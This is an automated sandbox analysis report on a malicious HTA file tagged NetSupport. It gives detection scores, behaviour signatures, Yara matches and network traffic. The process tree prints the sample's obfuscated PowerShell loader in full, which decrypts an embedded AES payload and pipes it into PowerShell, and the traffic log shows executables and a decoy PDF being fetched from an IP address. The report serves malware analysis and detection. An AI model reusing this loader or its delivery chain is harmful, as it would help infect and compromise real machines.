Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta

Overview

General Information

Sample Name:a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
Analysis ID:1320936
MD5:24d2c1fc57fcced31089d89c8178605b
SHA1:b06f20ea60cbe3785a38702d8e2072aa5f0327ca
SHA256:01a56c5b210084f1f6831c9b517bb3bd25564faeb0a2ca075d93027aa632f01b
Tags:htaNetSupport
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Very long command line found
Suspicious powershell command line found
Contains functionality to modify clipboard data
Suspicious command line found
Powershell drops PE file
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Uses the system / local time for branch decision (may execute only at specific dates)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 2832 cmdline: mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4208 cmdline: "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5292 cmdline: powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 5224 cmdline: powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • Acrobat.exe (PID: 1840 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 3324 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 5196 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • putty.exe (PID: 7236 cmdline: "C:\Users\user\putty.exe" MD5: 7A0DFC5353FF6DE7DE0208A29FA2FFC9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4564INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2879:$b2: ::FromBase64String(
  • 0x28ae:$b2: ::FromBase64String(
  • 0x1aa9c:$b2: ::FromBase64String(
  • 0x1aad3:$b2: ::FromBase64String(
  • 0x1d042:$b2: ::FromBase64String(
  • 0x1d079:$b2: ::FromBase64String(
  • 0x252ea:$b2: ::FromBase64String(
  • 0x25321:$b2: ::FromBase64String(
  • 0x338e4:$b2: ::FromBase64String(
  • 0x3391b:$b2: ::FromBase64String(
  • 0x3489b:$b2: ::FromBase64String(
  • 0x348d2:$b2: ::FromBase64String(
  • 0x36cf5:$b2: ::FromBase64String(
  • 0x36d2a:$b2: ::FromBase64String(
  • 0x3753d:$b2: ::FromBase64String(
  • 0x37572:$b2: ::FromBase64String(
  • 0x16c03f:$b2: ::FromBase64String(
  • 0x16c076:$b2: ::FromBase64String(
  • 0x173d20:$b2: ::FromBase64String(
  • 0x173d57:$b2: ::FromBase64String(
  • 0x1c12d3:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 5292INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x976a4:$b1: ::WriteAllBytes(
  • 0xa5830:$b1: ::WriteAllBytes(
  • 0x18cafc:$b1: ::WriteAllBytes(
  • 0x18d17c:$b1: ::WriteAllBytes(
  • 0x18dc84:$b1: ::WriteAllBytes(
  • 0x15ae9:$b2: ::FromBase64String(
  • 0x15b20:$b2: ::FromBase64String(
  • 0x16371:$b2: ::FromBase64String(
  • 0x163a8:$b2: ::FromBase64String(
  • 0x16b53:$b2: ::FromBase64String(
  • 0x16b8a:$b2: ::FromBase64String(
  • 0x2eedb:$b2: ::FromBase64String(
  • 0x2ef10:$b2: ::FromBase64String(
  • 0x2f68b:$b2: ::FromBase64String(
  • 0x2f6c0:$b2: ::FromBase64String(
  • 0x356ad:$b2: ::FromBase64String(
  • 0x356e4:$b2: ::FromBase64String(
  • 0x35ead:$b2: ::FromBase64String(
  • 0x35ee4:$b2: ::FromBase64String(
  • 0x999d8:$b2: ::FromBase64String(
  • 0x99a0d:$b2: ::FromBase64String(

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaReversingLabs: Detection: 21%
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaVirustotal: Detection: 30%Perma Link
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: z:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: x:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: v:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: t:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: r:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: p:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: n:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: l:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: j:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: h:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: f:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: b:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: y:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: w:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: u:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: s:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: q:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: o:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: m:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: k:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: i:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: g:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile opened: a:Jump to behavior
Source: C:\Users\user\putty.exeCode function: 10_2_004486F8 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindClose,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004486F8
Source: global trafficHTTP traffic detected: GET /Research.pdf HTTP/1.1Host: 45.9.190.201Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.63/x86/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 93.93.131.124 93.93.131.124
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Oct 2023 13:30:12 GMTServer: ApacheLast-Modified: Tue, 06 Aug 2013 17:32:58 GMTETag: "79000-4e34ad0df95b5"Accept-Ranges: bytesContent-Length: 495616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 1f 98 4b 2a 7e f6 18 2a 7e f6 18 2a 7e f6 18 39 76 9f 18 28 7e f6 18 2f 72 96 18 28 7e f6 18 2f 72 f9 18 31 7e f6 18 39 76 ab 18 28 7e f6 18 d0 5d ef 18 2e 7e f6 18 a9 76 ab 18 3b 7e f6 18 2a 7e f7 18 1a 7f f6 18 2f 72 a9 18 96 7e f6 18 c6 75 a8 18 2b 7e f6 18 2f 72 ac 18 2b 7e f6 18 52 69 63 68 2a 7e f6 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 86 2e 01 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 60 05 00 00 60 02 00 00 00 00 00 25 f1 04 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 07 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 0c 07 00 f0 00 00 00 00 90 07 00 90 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 07 00 48 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 5f 05 00 00 10 00 00 00 60 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a b6 01 00 00 70 05 00 00 c0 01 00 00 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 58 00 00 00 30 07 00 00 20 00 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 3b 00 00 00 90 07 00 00 40 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000005.00000002.1423096498.0000000007430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: putty.exe, putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.drString found in binary or memory: http://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.drString found in binary or memory: http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj
Source: powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
